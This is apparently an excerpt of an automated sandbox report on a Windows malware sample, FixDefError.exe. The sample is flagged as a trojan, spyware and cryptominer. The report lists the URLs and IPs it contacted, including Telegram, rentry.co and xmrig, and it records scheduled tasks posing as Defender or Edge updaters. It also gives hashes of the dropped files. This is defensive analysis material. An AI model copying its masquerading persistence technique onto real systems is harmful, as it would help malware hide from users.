      http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.founder.com.cn/cnTF | FixDefError.exe, 00000000.00000003.252281963.0000000008682000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://go.micro | powershell.exe, 00000004.00000003.465541531.000000000544F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlxN | RegSvc.exe, 00000038.00000002.520725244.0000000002774000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.fontbureau.comicta | FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://raw.githubusercontent.com4 | ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000043.00000002.322806617.000001CFFD813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://xmrig.com/wizard | svhost.exe.1.dr | false | URL Reputation: safe | unknown
      https://%s.xboxlive.com | svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | low
      https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://github.com/Pester/Pester | powershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.carterandcone.comn | FixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253083653.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253039948.00000000086A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://www.carterandcone.coml | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://www.fontbureau.com/designers/frere-jones.html | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.fontbureau.comgr | ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://dynamic.t | svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://raw.githubusercontent.com | ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://raw.githubusercontent.com | ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://xmrig.com/benchmark/%s | svhost.exe.1.dr | false | URL Reputation: safe | unknown
      https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.fontbureau.com-s | ProgramStarter.exe, 00000001.00000003.255875959.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256014070.0000000007F12000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 00000043.00000003.318327858.000001CFFD84A000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.fontbureau.com/designersG | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://www.fontbureau.com/designers/? | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://www.founder.com.cn/cn/bThe | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://www.fontbureau.com/designersJ | ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.fontbureau.com/designers? | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://github.com | ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://www.carterandcone.comams | FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://www.tiro.com | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253314357.00000000086A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://www.goodfont.co.kr | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.carterandcone.com | FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253083653.00000000086A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.typography.netD | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                                        http://github.comProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.galapagosdesign.com/staff/dennis.htmFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://fontfabrik.comFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://api.telegram.org4ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.fontbureau.com/designersmProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.tiro.comlic;FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            low
                                                                                            http://www.fontbureau.com/designersaFixDefError.exe, 00000000.00000003.271991817.000000000867C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.fontbureau.com773.ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://github.com4ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.google.comProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.fonts.comFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.sandoll.co.krFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://apis.google.comProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.urwpp.deFixDefError.exe, 00000000.00000003.256592203.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256719673.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256707046.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.sakkal.comFixDefError.exe, 00000000.00000003.254806233.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254862842.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254771694.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254676957.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254697046.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254834071.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254615093.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254648692.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.fontbureau.com/designerssProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.sandoll.co.kreVFixDefError.exe, 00000000.00000003.251806993.0000000008685000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.apache.org/licenses/LICENSE-2.0FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.fontbureau.comFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.agfamonotype.FixDefError.exe, 00000000.00000003.271991817.000000000867C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://www.tiro.comuFixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://xmrig.com/wizard%ssvhost.exe.1.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.fontbureau.com/designers/frere-jones.ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.urwpp.deFFixDefError.exe, 00000000.00000003.256576400.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256691395.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256604586.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256592203.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256719673.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256707046.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
142.251.209.36 | www.google.com | United States | 15169 | GOOGLEUS | false
104.237.62.211 | api4.ipify.org | United States | 18450 | WEBNXUS | false
198.251.88.130 | rentry.co | United States | 53667 | PONYNETUS | false
140.82.121.3 | github.com | United States | 36459 | GITHUBUS | false
185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false

IP
192.168.2.1
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 829697
Start date and time: 2023-03-19 00:16:08 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 41s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 77
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: FixDefError.exe
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.mine.winEXE@108/25@10/7
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe, RuntimeBroker.exe
• TCP Packets have been reduced to 100
• Excluded domains from analysis (whitelisted): fs.microsoft.com, pool.hashvault.pro
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
Time | Type | Description
00:17:17 | Task Scheduler | Run new task: AntiMalwareServiceExecutable path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:17:17 | Task Scheduler | Run new task: MicrosoftEdgeUpd path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:17:17 | Task Scheduler | Run new task: RuntimeBroker path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:17:17 | Task Scheduler | Run new task: SecurityHealthSystray path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:17:18 | Task Scheduler | Run new task: WindowsDefender path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:17:18 | Task Scheduler | Run new task: WmiPrvSE path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:17:22 | Task Scheduler | Run new task: ActivationRuntime path: C:\ProgramData\RuntimeBrokerData\RegSvc.exe
00:17:22 | Task Scheduler | Run new task: NvStray path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:17:22 | API Interceptor | 2x Sleep call for process: ProgramStarter.exe modified
00:17:23 | Task Scheduler | Run new task: OneDriveService path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:17:23 | Task Scheduler | Run new task: Agent Activation RuntimeServices_bk903 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:17:23 | Task Scheduler | Run new task: AntiMalwareSericeExecutableServices_bk64 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:17:23 | Task Scheduler | Run new task: MicrosoftUpdateServicesServices_bk620 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:17:23 | Task Scheduler | Run new task: SettingSysHostServices_bk248 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:17:24 | Task Scheduler | Run new task: WindowsDefenderServicesServices_bk697 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:17:26 | Task Scheduler | Run new task: ActivationRule path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
00:18:25 | API Interceptor | 23x Sleep call for process: powershell.exe modified
No context
Process: C:\ProgramData\RuntimeBrokerData\RegSvc.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1904
Entropy (8bit): 6.026358237126419
Encrypted: false
SSDEEP: 48:e/1cqvurjwu2uNtmRuxh0M2pMoE8Vjcp4D77XURG1BZJrM5i:eTcIuNbb0ZpM4D7OG11M5i
MD5: 429780A397E429FCA432914867ED1CDC
SHA1: 0BE35D51901BEE31664CBA07D643055E007D4D22
SHA-256: 74F2DD790ED25DF1BCA9B0071D51D03BB118BD968612061219EBF3CE768BF67C
SHA-512: 36DC70A756D3F38243E7DDC9AB387E607C419E769F7BFD7AB0FDC60E555B2174FE0C2CAB2F9F74A160FCD24E95AC62930AD5000715AAD2FF90EAB76FD5361A44
Malicious: false
Preview: P2YPPhDz2KgW0IVwLRnW4qt3YuF6x8NZ5xoXmqmz37FCoxjTHWkt+X3+y2oVWO04wLu5EhroPNIzgcjocysWxC3R4RYw3AoWtHLuHtRwr9Ph2lOJO/3iQ5XHPgFJA78H1eNdfbDu6wCPXQse9EPll90YNDJ8crZ3BASPTapcn80vo34lxgXydo0=..GrbpRTtne0IhO3CfL0pztj/WolibZidFhI+u9T/g7MWgnAplx87A9nyGZwJSZuvFUh3EgbzP/8hArtvEHY37f7MeWLDqg7FsOUlCs1ZlzP23UTZ1RemyYnROaDZUTYNf0R8nP4z7uoLtuydhMibd0LfUqgkpiTJs5p9e5dMhkjbkmFmqlnxQz1I=..N6XCeEdl9HDadAeTv8qCG8X5sxfVzinG2elN7Xl3RAWbKJ/Ch4L4H+hG56JWby3uk7aYqdDSdoQHCCRsderJvz3TZMPH1f3LEHivhE1xCIWKn8QD6SQsAQXNY/543dduSeNCnniFm8LUkTCLshLYJyToVtNA+8H2b5MJFjzqTXEsb0U16cFVQ1I=..RhSnZTLVfydTWog1a6UAy9nkDPUkAmhdXIzDitiGNsUoT84yyxEWOpfY6QFQkHpM9LpzclftvuzWf0UsjRMm6xK4LB5R2G/faa2D95nAAE5xoO5ONN9X/xNjYcjE2GKHwz7N6Hml496JXt7SN4MiUHK5FfcybKQETJM44PFiv2dtAYM+XQoIURc=..W9h1WsdZtRbTm+5qrKodGvUxMbCWotRQGLtUsyCo/ydg5wvQzLR5Y+QzsY3pWc3DPru1y5Dbf1IGlF/hnZ7TdOWnXSvaerRfQQqjE26ByT5kGEhs59/PibkZir3cACuh57Jm2ye2ZWANmjj4NBvj5dmPOd8UyZDPqFxgZ/xr4VL0qG+gkEjj0u4=..ubvyG4W8YbIKOpv1itsiGVW9EzUEamCyM6rU5KEZZdac/zXp4WSNWjFNu3xv6no96lusaS
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:ASCII text, with very long lines (484), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):916
                                                                                                                  Entropy (8bit):6.006091656254043
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:iyHCgHveQdw0d7YLqwx3DpWiO0cBCcH5y8d+M5:iyiEz77YLqGEiaBJYM
                                                                                                                  MD5:D80CBDF7FBA88ECF7F28F4CD6304B315
                                                                                                                  SHA1:D5AC6E2C716E522E65194289D6A2E381C7E40D4F
                                                                                                                  SHA-256:F4CB8536FB87529314794A5E826930DF121436D04E52F2EEB868CBAFF6E4BE01
                                                                                                                  SHA-512:30A9015929C335A82E85BE067D6624BE68C7B288BF3C0D4A4A6190A1A62D1E3321AFA3943E0EF4B7BF2374374C327E785D806E2D919CA4905D778A6B1192B5CC
                                                                                                                  Malicious:false
                                                                                                                  Preview:91Kuym2o0uO1/JlBTKuGYsxlDwJ2KhbLg7HsEo2BQs3wRIgYtyArhVGuksyXMLWdzr4Q+6X5BXNhuPoIAW6EEcKLi4dltHqfZkJ75+yYf8gnQpCiCV5v940icl4TuX6Tvg9kmbSMbhq6z5AUIVj25RFurUUq5bphUJVFS5KIoNB4QTSK1c1nDqg=..0WYkiYGW5Edi+bvRlMTlg+9tKzAf6jFXVuenq9wOhLZqcmOBpKkBojF/Dgg2JARga43C4vNTSf5p8b+RhJHOH7dvj21cEblamTWQP4PeTAo7zTUycNhOsy6ie6HLzP1yS7HYD2m+i7kVIzhOUeEgjnsjQiUpT2/DLOgRDkFEQJr1AmjCOsIwh1+QoPo0dj93eog9eKccnPkwNCSgTuqo7emoyvIeKyO8mJkhCPpjpAlxMlIyU6NENUqTyeKlUb1IOElYGYfcNZxMKDDoQ0Lx7Ft1A0u6QqkQCVin0QkaUsFxvb7DEDcyFPsXQaUB4KCAKBsrBcVAsXSjOew7YJh1LavFo9vAzebVDGwWyCKVMRcym0AmZFznpN84upYfOxnFVQYldwSf1OCxr+NWnmz032Ht98zrhDMBubZHTARjjP5LSZLiVk7M5f/kltzQaHYhzbzbGUhJZlZ7SzGriJiGi/rgnUQdeKGOHQ==..KyDTvW5GhLdanpKLz21nhq5NL+Rc0RCZwkL4YQ8lbbvGt3Y0EesDT13+bgpfkEEC+fod0jDQUy/oMfMFwROck7ZLTHjPFCisZC7PtCbO0GaZw4M67/eC2YJkmwbGuJReab1bOE/Wmhpy55AcAAKwf+gc3i5Q4x5abIp+ioFlrd7SrFrC1lwXaNlJHRISaGykUPsppIXd+zRpyCUHpseK/GxMk322Y9a2Ug==..1..171010202..
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):88064
                                                                                                                  Entropy (8bit):6.229523170202207
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:bJYuREHvD7cJ/kXCUJaOXIz8o+ZdH+Qij6Tiz:lrRyJwQo+ZdH+hj6mz
                                                                                                                  MD5:BFD02E7E401667B6C5853FE0FBEC26E7
                                                                                                                  SHA1:F257EBD2D6975C8B98536D3CA46A188BD50CBD09
                                                                                                                  SHA-256:030EC5352DE04F4773F5EB701E1506D3A97B948BC8BB9CF817F479D5A4E765DA
                                                                                                                  SHA-512:DB355DE9D1AA0C2DD5459253214F8634EA932D213706608827174B311DF718BFD5378898C4D3B4CEC0CCDCD0F90517931B5F977898DC9AD0B56E775C7B9F96A3
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
